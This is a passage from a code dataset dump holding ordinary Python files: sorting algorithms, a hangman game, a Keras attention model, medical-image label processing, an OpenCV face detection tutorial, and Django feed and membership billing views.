Optional[str] = None\n ) -> List[DataBlock]:\n blocks = []\n if not self.output_blocks:\n return blocks\n env.md_api.begin() # TODO: hanging session\n for bs in self.output_blocks[name or DEFAULT_OUTPUT_NAME]:\n dbid = bs[\"id\"]\n block = env.md_api.execute(\n select(DataBlockMetadata).filter(DataBlockMetadata.id == dbid)\n ).scalar_one()\n mds = block.as_managed_data_block(env)\n blocks.append(mds)\n return blocks\n","sub_path":"snapflow/core/execution/executable.py","file_name":"executable.py","file_ext":"py","file_size_in_byte":7099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395073079","text":"from random import randint\n\ndef quicksort(arr):\n if len(arr) < 2: return arr\n smaller, equal, larger = [], [], []\n 
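# choose the pivot uniformly at random: this keeps the expected running time\n    # O(n log n) even on already-sorted input\n    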
pivot = arr[randint(0, len(arr)-1)]\n\n    for x in arr:\n        if x < pivot: smaller.append(x)\n        elif x == pivot: equal.append(x)\n        else: larger.append(x)\n\n    return quicksort(smaller) + equal + quicksort(larger)\n\ndef quicksort_2(arr, lo, hi):\n    if len(arr) < 2: return arr\n    if lo < hi:\n        pi = partition(arr, lo, hi)\n        quicksort_2(arr, lo, pi-1)\n        quicksort_2(arr, pi+1, hi)\n\ndef partition(arr, lo, hi):\n    i = lo - 1\n    pivot = arr[hi]\n    for j in range(lo, hi):\n        if arr[j] <= pivot:\n            i = i + 1\n            arr[i], arr[j] = arr[j], arr[i]\n    arr[i+1], arr[hi] = arr[hi], arr[i+1]\n    return i + 1\n\narr = [1, 2, 7, 5, 6, 12, 5, 7, 32, 87, 1, 2, 5]\n\nprint(quicksort(arr))\nquicksort_2(arr, 0, len(arr)-1)  # sorts arr in place and returns None, so print arr afterwards\nprint(arr)","sub_path":"Quicksort.py","file_name":"Quicksort.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"559312882","text":"def jogar():\n    print(\"**********************************\")\n    print(\"***Welcome to the Hangman game!***\")\n    print(\"**********************************\")\n\n    palavra_secreta = \"python\".upper()\n    letras_acertadas = [\"_\", \"_\", \"_\", \"_\", \"_\", \"_\"]\n    erros = 0\n\n    enforcou = False\n    acertou = False\n\n    print(letras_acertadas)\n\n    while(not enforcou and not acertou):\n\n        chute = input(\"Which letter? \")\n        chute = chute.strip().upper()\n\n        if(chute in palavra_secreta):\n            index = 0\n            for letra in palavra_secreta:\n                if(chute == letra):\n                    letras_acertadas[index] = letra\n                index += 1\n        else:\n            erros += 1\n\n        enforcou = erros == 6\n        acertou = \"_\" not in letras_acertadas  # no blanks left means the word is fully guessed\n        print(letras_acertadas)\n\n    if(acertou):\n        print(\"You won!\")\n    else:\n        print(\"You lost!!\")\n    print(\"Game over\")\n\nif(__name__ == \"__main__\"):\n    jogar()","sub_path":"Intro/jogos/escolher_jogo/jogo_forca.py","file_name":"jogo_forca.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"563283474","text":"import keras\nfrom keras.layers import *\nfrom keras_self_attention import SeqSelfAttention\n# https://pypi.org/project/keras-self-attention/\n# pip install keras-self-attention\n# NOTE: this file is a snippet -- hidden_size, time_steps, feature_num, y_dim,\n# mish, f1_score and wrapped_loss are assumed to be defined elsewhere.\n\ndef classifier_att(alpha_cb, optimizer='adam',dropout=0.5):\n    model = keras.models.Sequential()\n    #model.add(keras.layers.LSTM(units=hidden_size, input_shape=(time_steps,feature_num), return_sequences=True))\n    #model.add(keras.layers.Bidirectional(keras.layers.LSTM(units=hidden_size,return_sequences=True)))\n    model.add(keras.layers.Bidirectional(keras.layers.LSTM(units=hidden_size,return_sequences=True),input_shape=(time_steps,feature_num)))\n    model.add(SeqSelfAttention(attention_activation='sigmoid'))\n    model.add(keras.layers.LSTM(units=hidden_size,return_sequences=True))\n    model.add(Dropout(dropout))\n    model.add(TimeDistributed(Dense(int(hidden_size/2), activation=mish)))\n    model.add(Flatten())\n    model.add(Dense(y_dim)) # Dense layer has y_dim=1 or 2 neurons.\n    model.add(Activation('softmax'))\n\n    #model.compile(loss=wrapped_loss(alpha_cb), optimizer=optimizer, metrics=[f1_score])\n    model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=[f1_score])\n    return model\n","sub_path":"classifier_att_snippet.py","file_name":"classifier_att_snippet.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"82212423","text":"import os\n\nimport nibabel as nib\nimport numpy as np\n\nroot_dir = \"./data\"\n\nsrc_label 
= os.path.join(root_dir, \"RawData/Training/label\")\n\ndst_Spleen = os.path.join(root_dir, \"btcv_spleen/labelsTr\")\n\nos.makedirs(os.path.join(root_dir, \"btcv_spleen\"), exist_ok=True)\nos.makedirs(dst_Spleen, exist_ok=True)\n\nfor path, subdirs, files in os.walk(src_label):\n    for file in files:\n        label_file = os.path.join(src_label, file)\n        label = nib.load(label_file)\n        label = nib.funcs.as_closest_canonical(label, enforce_diag=False)\n        affine = label.affine\n        label = np.array(label.dataobj)\n        label = label.astype(np.float32)\n        label[label == 5] = 0\n        label[label == 6] = 5\n        label[label == 11] = 6\n        label[label > 6] = 0\n        print(\"file: \", file)\n        # 1-spleen, 2-right kidney, 3-left kidney, 4-Gallbladder, 5-liver, 6-Pancreas\n        print(\"label-0: \", (label == 0).sum())\n        print(\"label-1: \", (label == 1).sum())\n        print(\"label-2: \", (label == 2).sum())\n        print(\"label-3: \", (label == 3).sum())\n        print(\"label-4: \", (label == 4).sum())\n        print(\"label-5: \", (label == 5).sum())\n        print(\"label-6: \", (label == 6).sum())\n        print(\"label-7: \", (label == 7).sum())\n        print(\"label-8: \", (label == 8).sum())\n        print(\"label-9: \", (label == 9).sum())\n\n        mask = label.copy()\n        mask[mask != 1] = 0\n        if (mask == 1).sum() != 0:\n            nib.save(\n                nib.Nifti1Image(mask, affine),\n                os.path.join(dst_Spleen, file),\n            )\n","sub_path":"model_zoo/adapt_bundle_to_another_dataset/split_spleen_labels.py","file_name":"split_spleen_labels.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"30839906","text":"import xlrd\n\n\n# ----------------------------------------------------------------------\ndef open_file(path):\n    \"\"\"\n    Open and read an Excel file\n    \"\"\"\n    book = xlrd.open_workbook(path)\n\n    # print number of sheets\n    print(book.nsheets)\n\n    # print sheet names\n    print(book.sheet_names())\n\n    # get the first worksheet\n    first_sheet = book.sheet_by_index(0)\n\n    # read a row\n    print(first_sheet.row_values(0))\n\n    # read a cell\n    cell = first_sheet.cell(0, 0)\n    print(cell)\n    print(cell.value)\n\n    # read a row slice\n    print(first_sheet.row_slice(rowx=0,\n                                start_colx=0,\n                                end_colx=2))\n\n\n\n\ndef loadFile(fileName):\n    open_file(fileName)\n\n\ndef main():\n    fileName = \"inbox/7872_Transactions_30_05_2018.xls\"\n    loadFile(fileName)\n\nmain()","sub_path":"src/discarded/xlsParser.py","file_name":"xlsParser.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"370121452","text":"from django.contrib.auth import logout\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render_to_response\nfrom django.views.generic import TemplateView\nfrom django.views.generic import ListView\n\nfrom itertools import chain\n\nfrom users.models import User\nfrom links.models import Link, LinkManager\nfrom reposts.models import Repost\nfrom notifications.models import Notification\n\ndef logout_page(request):\n    logout(request)\n    return HttpResponseRedirect('/')\n\nclass WelcomeView(TemplateView):\n    template_name = \"index.html\"\n\nclass HomeView(ListView):\n    model = Link\n    template_name = \"home.html\"\n    context_object_name = 'post_list'\n\n    def get_queryset(self):\n        if self.request.user.is_anonymous():\n            queryset = sorted(chain(Link.objects.all(),Repost.objects.all()), key=lambda instance: instance.created_at, reverse=True)\n        else:\n            following = self.request.user.following.all()\n            if not following.exists():\n                
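# the user follows no one, so fall back to the global feed\n                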
queryset = sorted(chain(Link.objects.all(),Repost.objects.all()), key=lambda instance: instance.created_at, reverse=True)\n            else:\n                queryset = chain()\n                for user in following:\n                    queryset = chain(queryset,user.links.all(),user.reposts.all())\n        return sorted(queryset, key=lambda instance: instance.created_at, reverse=True)\n\n    def get_context_data(self, **kwargs):\n        context = super(HomeView, self).get_context_data(**kwargs)\n        return context\n\n    def render_to_response(self, context):\n        if bool(self.request.GET):\n\n            if (\"link-repost-button\" in list(self.request.GET.keys())[0]):\n                link_id = int(list(self.request.GET.keys())[0][19:])\n                if not self.request.user.is_anonymous():\n                    link = Link.objects.get(pk=link_id)\n                    link.hotness = link.hotness + 1\n                    link.save()\n                    Repost.objects.create_repost(link, self.request.user)\n\n                    repost_notification = Notification.objects.create_notification('reposted', link.posted_by, self.request.user)\n                    repost_notification.save()\n\n\n            if (\"repost-repost-button\" in list(self.request.GET.keys())[0]):\n                repost_id = int(list(self.request.GET.keys())[0][21:])\n                if not self.request.user.is_anonymous():\n                    repost = Repost.objects.get(pk=repost_id)\n                    repost.original.hotness = repost.original.hotness + 1\n                    repost.original.save()\n                    Repost.objects.create_repost(repost.original, self.request.user, repost)\n\n                    repost_notification = Notification.objects.create_notification('reposted', repost.original.posted_by, self.request.user)\n                    repost_notification.save()\n\n\n        return super(HomeView, self).render_to_response(context)\n","sub_path":"line/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"649919236","text":"\"\"\"\nUtils for berp\n\"\"\"\n\nimport re\nimport string\nfrom datetime import date\n\nfrom dateutil.parser import parse as dateutil_parse\n\n\ndef clean_company_name(name):\n    \"\"\"\n    Args:\n        name (str): company name\n\n    Return:\n        (str): company name with only alphanumeric characters\n    \"\"\"\n    return ''.join(c.lower() for c in company_search_name(name) if c.isalnum())\n\n\ndef company_search_name(name):\n    \"\"\"\n    Args:\n        name (str): company name\n\n    Return:\n        (str): company name with extras that would mess up a search removed,\n            for example punctuation or \"inc\" or \"plc\"\n    \"\"\"\n    exclude = set(string.punctuation)\n    name = ''.join(ch for ch in name if ch not in exclude)\n    return re.sub(r'(inc|plc|corp|ltd|shs)$', '', name, flags=re.IGNORECASE).strip()\n\n\ndef get_date(date_string):\n    \"\"\"\n    Extracts the date from a potentially fuzzy date string\n\n    Args:\n        date_string (str): fuzzy date string\n\n    Returns:\n        Date if one exists\n        None otherwise\n    \"\"\"\n    d = dateutil_parse(date_string,\n                       fuzzy=True,\n                       default=date(year=1900, month=1, day=1))\n    if d != date(1900, 1, 1):\n        return d\n    else:\n        return None","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
+{"seq_id":"612937366","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 7 17:28:35 2020\r\n\r\n@author: Romain\r\n\"\"\"\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef empty(a):\r\n    pass\r\n\r\n\r\ndef stackImages(scale,imgArray):\r\n    rows = len(imgArray)\r\n    cols = len(imgArray[0])\r\n    rowsAvailable = isinstance(imgArray[0], list)\r\n    width = imgArray[0][0].shape[1]\r\n    height = imgArray[0][0].shape[0]\r\n    if rowsAvailable:\r\n        for x in range(0, rows):\r\n            for 
y in range(0, cols):\r\n if imgArray[x][y].shape[:2] == imgArray[0][0].shape [:2]:\r\n imgArray[x][y] = cv2.resize(imgArray[x][y], (0, 0), None, scale, scale)\r\n else:\r\n imgArray[x][y] = cv2.resize(imgArray[x][y], (imgArray[0][0].shape[1], imgArray[0][0].shape[0]), None, scale, scale)\r\n if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR)\r\n imageBlank = np.zeros((height, width, 3), np.uint8)\r\n hor = [imageBlank]*rows\r\n hor_con = [imageBlank]*rows\r\n for x in range(0, rows):\r\n hor[x] = np.hstack(imgArray[x])\r\n ver = np.vstack(hor)\r\n else:\r\n for x in range(0, rows):\r\n if imgArray[x].shape[:2] == imgArray[0].shape[:2]:\r\n imgArray[x] = cv2.resize(imgArray[x], (0, 0), None, scale, scale)\r\n else:\r\n imgArray[x] = cv2.resize(imgArray[x], (imgArray[0].shape[1], imgArray[0].shape[0]), None,scale, scale)\r\n if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR)\r\n hor= np.hstack(imgArray)\r\n ver = hor\r\n return ver\r\n\r\n\r\n################################## Face Detection\r\n\r\n\r\nfaceCascade = cv2.CascadeClassifier(\"cascades/haarcascade_frontalface_default.xml\")\r\nimg = cv2.imread(\"nini.JPG\")\r\nimgResize = cv2.resize(img,(400,300))\r\nimgGray = cv2.cvtColor(imgResize, cv2.COLOR_BGR2GRAY)\r\n\r\n\r\nfaces = faceCascade.detectMultiScale(imgGray, 1.1, 4)\r\n\r\nfor (x,y,w,h) in faces:\r\n cv2.rectangle(imgResize,(x,y),(x+w, y+h), (255,0,0), 2)\r\n \r\n\r\n \r\ncv2.imshow(\"face\", imgResize)\r\ncv2.waitKey(0)\r\n\r\n\"\"\"\r\n################################## Color Detection\r\n\r\ncv2.namedWindow(\"TrackBars\")\r\ncv2.resizeWindow(\"TrackBars\", 640, 240)\r\ncv2.createTrackbar(\"Hue min\", \"TrackBars\",0,179,empty)\r\ncv2.createTrackbar(\"Hue max\", \"TrackBars\",179,179,empty)\r\ncv2.createTrackbar(\"Sat min\", \"TrackBars\",0,255,empty)\r\ncv2.createTrackbar(\"Sat max\", \"TrackBars\",255,255,empty)\r\ncv2.createTrackbar(\"Val min\", \"TrackBars\",0,255,empty)\r\ncv2.createTrackbar(\"Val max\", \"TrackBars\",255,255,empty)\r\n\r\nwhile True:\r\n img = cv2.imread(\"nini.JPG\")\r\n\r\n imgResize = cv2.resize(img,(400,300)) #OpenCV : Width first, then high\r\n imgHSV = cv2.cvtColor(imgResize, cv2.COLOR_BGR2HSV)\r\n\r\n h_min = cv2.getTrackbarPos(\"Hue min\", \"TrackBars\")\r\n h_max = cv2.getTrackbarPos(\"Hue max\", \"TrackBars\")\r\n s_min = cv2.getTrackbarPos(\"Sat min\", \"TrackBars\")\r\n s_max = cv2.getTrackbarPos(\"Sat max\", \"TrackBars\")\r\n v_min = cv2.getTrackbarPos(\"Val min\", \"TrackBars\")\r\n v_max = cv2.getTrackbarPos(\"Val max\", \"TrackBars\")\r\n\r\n print(h_min, h_max, s_min, s_max, v_min, v_max)\r\n lower = np.array([h_min, s_min, v_min])\r\n upper = np.array([h_max, s_max, v_max])\r\n mask = cv2.inRange(imgHSV, lower, upper) \r\n imgResult = cv2.bitwise_and(imgResize,imgResize,mask=mask)\r\n \r\n \r\n\r\n # cv2.imshow(\"Original\", imgResize)\r\n # cv2.imshow(\"HSV\", imgHSV)\r\n # cv2.imshow(\"mask\", mask)\r\n # cv2.imshow(\"Results\", imgResult)\r\n \r\n imgStack = stackImages(0.2, ([img,imgHSV],[mask,imgResult]))\r\n cv2.imshow(\"stacked Images\", imgStack)\r\n \r\n cv2.waitKey(1)\r\n\r\n\"\"\"\r\n \r\n \r\n\"\"\"\r\n################################## Redressage d'image\r\nimg = cv2.imread(\"Redresse.jpg\")\r\nimgResize = cv2.resize(img,(400,700)) #OpenCV : Width first, then high\r\nwidth, height = 400, 700\r\npts1 = np.float32([[179,619], [763,561],[253,1401],[1030,1260]])\r\npts2 = np.float32([[0,0], [width, 0], [0,height], 
[width,height]])\r\nmatrix = cv2.getPerspectiveTransform(pts1,pts2)\r\nimgOutPut = cv2.warpPerspective(img, matrix, (width, height))\r\n\r\ncv2.imshow(\"Image\", imgResize)\r\ncv2.imshow(\"Feuille\", imgOutPut)\r\n\r\n\r\ncv2.waitKey(0)\r\n\"\"\"\r\n\r\n\"\"\"\r\n################################## Shapes and texts\r\n\r\nimg = np.zeros((512,512,3),np.uint8)\r\n\r\n#img[200:300,200:300] = 135,45,56\r\ncv2.line(img,(0,0),(200,300),(0,0,255),4) #(img,startPt, EndPt, Color, Thickness)\r\ncv2.rectangle(img,(0,0),(200,300),(0,255,0),6) # the same\r\ncv2.circle(img,(300,150), (100),(255,0,0),8) # (img, centerPt, radius, color, thickness)\r\ncv2.putText(img, \"Coucou\", (0,400), cv2.FONT_HERSHEY_COMPLEX, 4, (20,130,200),2) #(img, text, centerPt, Font, Scale, Color, thickness)\r\n\r\ncv2.imshow(\"Image\", img)\r\n\r\n\r\ncv2.waitKey(0)\r\n\"\"\"\r\n\r\n\"\"\"\r\n################################## Image modifications\r\nimg = cv2.imread(\"nini.JPG\")\r\nkernel = np.ones((11,11),np.uint8)\r\nprint(img.shape)\r\nimgResize = cv2.resize(img,(400,300)) #OpenCV : Width first, then high\r\nimgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\nimgGrayBlur = cv2.GaussianBlur(imgGray, (7,7),50)\r\nimgBlur = cv2.GaussianBlur(img, (51,51), 0)\r\nimgCanny = cv2.Canny(img, 20, 20)\r\nimgDialation = cv2.dilate(imgCanny, kernel, iterations=1)\r\nimgCropped = img[0:150,50:250] #Not OpenCV so first high and then width\r\ncv2.imshow(\"Gray Image\", imgGray)\r\n\"\"\"\r\n\r\n\"\"\"\r\n################################## Camera video capture\r\ncap = cv2.VideoCapture(0)\r\n\r\ncap.set(3,640)\r\ncap.set(4,480)\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n cv2.imshow(\"Video\",img)\r\n if cv2.waitKey(1) & 0xFF ==ord('q'):\r\n break\r\n \r\n\"\"\"\r\n","sub_path":"Chapter1.py","file_name":"Chapter1.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"454740641","text":"# import random\n# pool=list(range(1,71))\n# random.sample(pool, 5)\n\n# import os\n# print(os.getcwd())\n\n# fout = open('output.txt', 'a')\n\n# line1 = \"How many roads must a man walk down\\n\"\n# fout.write(line1)\n\n# line2 = \"Before you call him a man?\\n\"\n# fout.write(line2)\n# fout.close()\n\n# print(os.path.abspath('session12/output.txt'))\n# print(os.path.exists('session14/input.txt'))\n\n# import pickle\n# t = [1, 2, 3]\n\n# f = open('save.p', 'wb')\n# s = pickle.dump(t, f)\n# f.close()\n\n\n# t2 = pickle.load(open('save.p', 'rb'))\n# print(t2)\n\n\ndef linecount(filename):\n count = 0\n for line in open(filename):\n count += 1\n return count\n\nprint(linecount('wc.py'))\n\nif __name__ == '__main__':\n print(linecount('wc.py'))","sub_path":"session14/class.py","file_name":"class.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"548160855","text":"from datetime import datetime\nimport logging\nfrom braces.views import StaffuserRequiredMixin\nfrom django.db.models import Sum, Count, Q\nfrom django.http import JsonResponse\nfrom django.shortcuts import redirect\nfrom django.contrib import messages\nfrom django.views.generic import TemplateView, FormView\nfrom mysite.common import Button\nfrom members.forms import BillingForm, SettingsForm, PosAnalysisForm\nfrom members.models import Settings, ItemType, Invoice, InvoiceItem, Subscription, Fees\nfrom pos.models import PosPayment, VisitorBook, Transaction\nfrom events.models import Event\nfrom 
members.tasks import (\n schedule_item_billing,\n schedule_invoice_creation,\n schedule_mail_task,\n)\nfrom members.views.invoice_views import create_invoice_payment_task\nfrom members.mail import create_draft_invoice_mail_task, preview_mail_task_json\nfrom members.services import subscription_renew_all\nfrom pos.services import export_pos\n\nstdlogger = logging.getLogger(__name__)\n\n\nclass SetYearView(StaffuserRequiredMixin, FormView):\n \"\"\"\n Change membership year in Setting File\n \"\"\"\n\n form_class = SettingsForm\n template_name = \"members/crispy_tile.html\"\n title = \"Set membership year\"\n\n def get_initial(self):\n initial = super().get_initial()\n initial[\"membership_year\"] = Settings.current_year()\n return initial\n\n def form_valid(self, form):\n Settings.set_current_year(form.cleaned_data[\"membership_year\"])\n return redirect(\"home\")\n\n\nclass YearEndView(StaffuserRequiredMixin, TemplateView):\n template_name = \"members/year_end.html\"\n title = \"Year end\"\n\n def get(self, request, *args, **kwargs):\n self.year = Settings.current_year()\n if datetime.now().year != self.year:\n messages.warning(\n request, f\"Please change the membership year before running year end\"\n )\n return redirect(\"billing-set-year\")\n if not Fees.objects.filter(sub_year=self.year).exists():\n messages.warning(\n request, f\"Please set fees for {self.year} before running year end\"\n )\n return redirect(\"fees-list\")\n return super().get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"expired\"] = Subscription.objects.expired(self.year).count()\n context[\"new_year\"] = self.year\n context[\"old_year\"] = self.year - 1\n return context\n\n def post(self, request):\n self.year = Settings.current_year()\n if \"renew\" in request.POST:\n count = subscription_renew_all(self.year, Subscription.START_MONTH)\n messages.info(request, f\"{count} subs were renewed\")\n return redirect(\"billing-period\")\n\n\nclass BillingView(StaffuserRequiredMixin, FormView):\n \"\"\"\n Year end requires that the year has been changed and the fees set\n \"\"\"\n\n template_name = \"members/billing.html\"\n form_class = BillingForm\n year = 0\n mailed = 0\n title = \"Period end\"\n mail_task = None\n\n def get_initial(self):\n self.year = Settings.current_year()\n self.from_date = datetime(self.year, Subscription.START_MONTH, 1).date()\n self.to_date = datetime.now().date()\n if self.to_date < self.from_date:\n self.to_date = self.from_date\n self.minimum_amount = 0\n self.invoice_date = datetime.now().date()\n self.invoice_from_date = datetime.now().date()\n self.invoice_to_date = datetime.now().date()\n self.mailed = 0\n initial = {\n \"from_date\": self.from_date,\n \"to_date\": self.to_date,\n \"minimum_amount\": self.minimum_amount,\n \"invoice_date\": self.invoice_date,\n \"invoice_from_date\": self.invoice_from_date,\n \"invoice_to_date\": self.invoice_to_date,\n \"mailed\": self.mailed,\n }\n return initial\n\n def get_invoice_queryset(self):\n invoices = Invoice.objects.filter(\n date__range=[self.invoice_from_date, self.invoice_to_date],\n state=Invoice.STATE.UNPAID,\n payment_task__isnull=True,\n ).order_by(\"person__first_name\")\n if self.mailed == 0:\n return invoices.filter(email_count=0)\n elif self.mailed == 1:\n return invoices.filter(email_count__gt=0)\n else:\n return invoices\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"year\"] = self.year\n bar = 
PosPayment.billing.unbilled_total(\n item_type_id=ItemType.BAR, from_date=self.from_date, to_date=self.to_date\n )\n teas = PosPayment.billing.unbilled_total(\n item_type_id=ItemType.TEAS, from_date=self.from_date, to_date=self.to_date\n )\n visitors = VisitorBook.billing.unbilled_total(\n from_date=self.from_date, to_date=self.to_date\n )\n tournaments = Event.billing.unbilled_total(item_type_id=ItemType.TOURNAMENT)\n events = Event.billing.unbilled_total(item_type_id=ItemType.SOCIAL)\n\n total = bar + teas + visitors + tournaments + events\n context[\"pos_bar\"] = bar\n context[\"pos_teas\"] = teas\n context[\"pos_visitors\"] = visitors\n context[\"tournaments\"] = tournaments\n context[\"events\"] = events\n context[\"total\"] = total\n qs = (\n InvoiceItem.objects.filter(invoice=None)\n .values(\"item_type_id\", \"item_type__description\")\n .annotate(total=Sum(\"amount\"))\n )\n query = \"?invoiced=0&item_type=\"\n context[\"items\"] = [\n [\n record[\"item_type__description\"],\n record[\"total\"],\n query + str(record[\"item_type_id\"]),\n ]\n for record in qs\n ]\n context[\"item_total\"] = sum([record[\"total\"] for record in qs])\n invoices = self.get_invoice_queryset()\n count = invoices.count()\n value = 0 if count == 0 else invoices.aggregate(value=Sum(\"total\"))[\"value\"]\n context[\"invoice_count\"] = count\n context[\"invoice_value\"] = value\n return context\n\n def post(self, request, *args, **kwargs):\n form_class = self.get_form_class()\n form = self.get_form(form_class)\n if form.is_valid():\n self.year = Settings.current_year()\n self.from_date = form.cleaned_data.get(\"from_date\", None)\n self.to_date = form.cleaned_data.get(\"to_date\", None)\n self.invoice_from_date = form.cleaned_data.get(\"invoice_from_date\", None)\n self.invoice_to_date = form.cleaned_data.get(\"invoice_to_date\", None)\n self.mailed = int(form.cleaned_data.get(\"mailed\", 0))\n text_block = form.cleaned_data.get(\"template\", None)\n id_list = list(self.get_invoice_queryset().values_list(\"id\", flat=True))\n mail_task = None\n if text_block:\n mail_task = create_draft_invoice_mail_task(request, id_list, text_block)\n else:\n return self.render_to_response(self.get_context_data(form=form))\n\n if \"filter\" in request.POST or \"invoice-filter\" in request.POST:\n return self.render_to_response(self.get_context_data(form=form))\n\n if \"send\" in request.POST:\n if mail_task:\n mail_task.save()\n schedule_mail_task(mail_task.id)\n create_invoice_payment_task(id_list)\n messages.info(\n request, f\"{len(id_list)} mails sent and payments scheduled\"\n )\n else:\n messages.error(request, f\"No email template selected\")\n return self.render_to_response(self.get_context_data(form=form))\n\n if request.is_ajax():\n command = form.cleaned_data.get(\"command\", None)\n if command in [\"bar\", \"teas\", \"visitors\", \"events\", \"tournaments\", \"all\"]:\n Settings.set_task_busy(True)\n schedule_item_billing(\n from_date=self.from_date, to_date=self.to_date, command=command\n )\n return JsonResponse({})\n\n elif command == \"create-invoices\":\n schedule_invoice_creation(\n form.cleaned_data[\"minimum_amount\"],\n form.cleaned_data[\"invoice_date\"],\n commit=True,\n )\n return JsonResponse({})\n\n # It's a preview\n index = form.cleaned_data.get(\"index\", None)\n return preview_mail_task_json(mail_task, index)\n return redirect(\"billing-period\")\n\n # elif 'consolidate' in request.POST:\n # counts = consolidate(year)\n # message = '{} people processed, {} unpaid and {} credit notes carried 
forward'.format(\n # counts[0], counts[1], counts[2])\n # messages.success(self.request, message)\n # return redirect('year-end')\n\n # elif 'renew' in request.POST:\n #\n # #count = subscription_renew_batch(year, Subscription.START_MONTH)\n # message = '{} subscriptions generated'.format(count)\n # messages.success(self.request, message)\n # return redirect('billing')\n #\n\n return redirect(\"billing-period\")\n\n\nclass FinanceAnalysisView(StaffuserRequiredMixin, FormView):\n template_name = \"members/financial_analysis.html\"\n form_class = PosAnalysisForm\n title = \"Financial analysis\"\n from_date = None\n to_date = None\n\n def __init__(self):\n year = Settings.current_year()\n self.from_date = datetime(year, Subscription.START_MONTH, 1).date()\n self.to_date = datetime.now().date()\n super().__init__()\n\n def get_initial(self):\n return {\"from_date\": self.from_date, \"to_date\": self.to_date}\n\n def all_transactions(self):\n return Transaction.subset.query(from_date=self.from_date, to_date=self.to_date)\n\n def bar_transactions(self):\n return self.all_transactions().filter(item_type_id=ItemType.BAR)\n\n def teas_transactions(self):\n return self.all_transactions().filter(item_type_id=ItemType.TEAS)\n\n def all_payments(self):\n return PosPayment.objects.filter(\n transaction__creation_date__date__range=[self.from_date, self.to_date]\n )\n\n def bar_payments(self):\n return self.all_payments().filter(transaction__item_type_id=ItemType.BAR)\n\n def teas_payments(self):\n return self.all_payments().filter(transaction__item_type_id=ItemType.TEAS)\n\n def visitors(self):\n return VisitorBook.objects.filter(date__range=[self.from_date, self.to_date])\n\n def items(self):\n return InvoiceItem.objects.filter(\n creation_date__range=[self.from_date, self.to_date]\n )\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context[\"buttons\"] = [Button(\"Filter\"), Button(\"Export\")]\n context[\"bar_accounts\"] = zero(\n self.bar_transactions()\n .filter(person_id__isnull=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_billed\"] = zero(\n self.bar_payments()\n .filter(transaction__person_id__isnull=False, billed=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_unbilled\"] = zero(\n self.bar_payments()\n .filter(transaction__person_id__isnull=False, billed=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_cash\"] = zero(\n self.bar_transactions()\n .filter(cash=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_comp\"] = zero(\n self.bar_transactions()\n .filter(complimentary=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_unattr\"] = zero(\n self.bar_transactions()\n .filter(person_id__isnull=True, cash=False, complimentary=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"bar_total\"] = zero(\n self.bar_transactions().aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n\n context[\"teas_accounts\"] = zero(\n self.teas_payments()\n .filter(transaction__person_id__isnull=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"teas_unbilled\"] = zero(\n self.teas_payments()\n .filter(transaction__person_id__isnull=False, billed=False)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"teas_billed\"] = zero(\n self.teas_payments()\n .filter(transaction__person_id__isnull=False, billed=True)\n .aggregate(Sum(\"total\"))[\"total__sum\"]\n )\n context[\"visitors\"] = 
